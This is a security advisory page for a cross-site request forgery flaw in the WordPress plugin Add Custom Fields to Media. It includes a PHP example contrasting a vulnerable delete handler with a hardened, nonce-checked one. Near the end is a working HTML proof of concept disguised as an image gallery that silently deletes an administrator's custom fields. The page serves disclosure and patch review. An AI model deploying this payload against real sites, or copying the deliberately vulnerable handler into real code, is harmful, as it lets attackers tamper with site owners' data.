Security Vulnerability Report
CVE-2026-4068 CVSS 4.3 MEDIUM

CVE-2026-4068

Published: 2026-03-19 07:16:00
Last Modified: 2026-04-22 21:32:08

Description

The Add Custom Fields to Media plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.3. This is due to missing nonce validation on the field deletion functionality in the admin display template. The plugin properly validates a nonce for the 'add field' operation (lines 24-36), but the 'delete field' operation (lines 38-49) processes the $_GET['delete'] parameter and calls update_option() without any nonce verification. This makes it possible for unauthenticated attackers to delete arbitrary custom media fields via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
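The fix for this class of bug is the standard WordPress nonce-plus-capability pattern. The following is an added illustration, not the plugin's own code: the option name (acfm_example_custom_fields), the nonce action prefix and the nonce parameter name (acfm_nonce) are hypothetical; only the admin page slug (add-custom-fields-to-media) is taken from the PoC URL on this page. The first function reproduces the vulnerable pattern the description refers to (a $_GET['delete'] value flows into update_option() with no check); the second shows the hardened handler, and the third shows how the legitimate delete link must be generated so that the handler can validate it.

```php
<?php
// Added example, not code from the Add Custom Fields to Media plugin.
// Option name, nonce action and nonce parameter name are hypothetical.
define( 'ACFM_EXAMPLE_OPTION', 'acfm_example_custom_fields' );

/**
 * Vulnerable pattern (the shape described in the advisory): the field name is
 * read from $_GET and the option is rewritten with no nonce or capability
 * check, so any page an administrator visits can trigger the deletion.
 */
function acfm_example_delete_field_vulnerable() {
    if ( ! isset( $_GET['delete'] ) ) {
        return;
    }
    $fields = (array) get_option( ACFM_EXAMPLE_OPTION, array() );
    $fields = array_diff( $fields, array( wp_unslash( $_GET['delete'] ) ) );
    update_option( ACFM_EXAMPLE_OPTION, array_values( $fields ) );
}

/**
 * Hardened pattern: require a capability, then verify a nonce bound to the
 * specific field being deleted. check_admin_referer() calls wp_die() when the
 * nonce is missing or invalid, so a forged cross-site request never reaches
 * update_option().
 */
function acfm_example_delete_field_hardened() {
    if ( ! isset( $_GET['delete'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'acfm-example' ) );
    }
    $field = sanitize_text_field( wp_unslash( $_GET['delete'] ) );

    // The nonce action includes the field name, so a token issued for one
    // field cannot be replayed to delete a different one.
    check_admin_referer( 'acfm_example_delete_' . $field, 'acfm_nonce' );

    $fields = (array) get_option( ACFM_EXAMPLE_OPTION, array() );
    $fields = array_diff( $fields, array( $field ) );
    update_option( ACFM_EXAMPLE_OPTION, array_values( $fields ) );
}

/**
 * Building the delete link on the admin page: wp_nonce_url() appends the
 * nonce parameter that check_admin_referer() validates later. Only links
 * rendered by the real admin page for the current user carry a valid token;
 * a link forged on a third-party page cannot include one.
 */
function acfm_example_delete_link( $field ) {
    $url = add_query_arg(
        array(
            'page'   => 'add-custom-fields-to-media', // page slug from the PoC URL on this page
            'delete' => $field,
        ),
        admin_url( 'admin.php' )
    );
    return wp_nonce_url( $url, 'acfm_example_delete_' . $field, 'acfm_nonce' );
}
```

Two points worth checking when reviewing a patch for a bug like this: the nonce must be verified on the delete path itself, not only on a neighbouring "add" path, and the capability check is separate from the nonce check (a nonce proves the request came from a page WordPress rendered for this user, not that the user is allowed to do the action). A state-changing action triggered by a bare GET is also what makes the img-tag delivery in the PoC possible; moving the delete to a POST form with the same nonce removes that delivery channel.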

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Add Custom Fields to Media WordPress plugin <= 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2026-4068 - Delete arbitrary media custom fields -->
<!-- Lure a logged-in administrator to this page; the specified fields are deleted automatically -->
<!DOCTYPE html>
<html>
<head>
  <title>Image Gallery</title>
</head>
<body>
  <h1>Check out these images!</h1>
  <img src="https://target-site.com/wp-content/uploads/2024/01/photo.jpg" alt="Photo">

  <!-- Hidden CSRF attack code -->
  <script>
    // Build the malicious requests that delete media fields
    // The attacker needs to know the field names; they can be enumerated or obtained by other means
    const maliciousFields = [
      'custom_author_field',
      'custom_copyright_field',
      'custom_alt_text',
      'custom_description_field'
    ];

    // Send the delete requests automatically
    maliciousFields.forEach(fieldName => {
      // Build the GET request that deletes the field
      const deleteUrl = 'http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete='
        + encodeURIComponent(fieldName);

      // Use the src attribute of an img tag to issue the GET request automatically
      const img = document.createElement('img');
      img.src = deleteUrl;
      img.style.display = 'none';
      document.body.appendChild(img);
    });

    // Send the requests with the fetch API (more reliable)
    maliciousFields.forEach(fieldName => {
      fetch('http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete='
        + encodeURIComponent(fieldName), {
        method: 'GET',
        credentials: 'include' // send the target site's cookies
      });
    });
  </script>

  <p>Click <a href="http://target-site.com/wp-admin/admin.php?page=add-custom-fields-to-media&delete=any_field">here</a> for more images.</p>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4068", "sourceIdentifier": "[email protected]", "published": "2026-03-19T07:16:00.090", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Add Custom Fields to Media plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.3. This is due to missing nonce validation on the field deletion functionality in the admin display template. The plugin properly validates a nonce for the 'add field' operation (line 24-36), but the 'delete field' operation (lines 38-49) processes the $_GET['delete'] parameter and calls update_option() without any nonce verification. This makes it possible for unauthenticated attackers to delete arbitrary custom media fields via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Add Custom Fields to Media para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 2.0.3, inclusive. Esto se debe a la falta de validación de nonce en la funcionalidad de eliminación de campos en la plantilla de visualización del administrador. El plugin valida correctamente un nonce para la operación de 'añadir campo' (líneas 24-36), pero la operación de 'eliminar campo' (líneas 38-49) procesa el parámetro $_GET['delete'] y llama a update_option() sin ninguna verificación de nonce. Esto hace posible que atacantes no autenticados eliminen campos de medios personalizados arbitrarios a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/tags/2.0.3/admin/partials/add-custom-fields-to-media-admin-display.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/tags/2.0.3/admin/partials/add-custom-fields-to-media-admin-display.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/trunk/admin/partials/add-custom-fields-to-media-admin-display.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/add-custom-fields-to-media/trunk/admin/partials/add-custom-fields-to-media-admin-display.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3481588%40add-custom-fields-to-media&new=3481588%40add-custom-fields-to-media&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/259a4950-9377-4d18-86ad-aadd97dcdbc7?source=cve", "source": "[email protected]"}]}}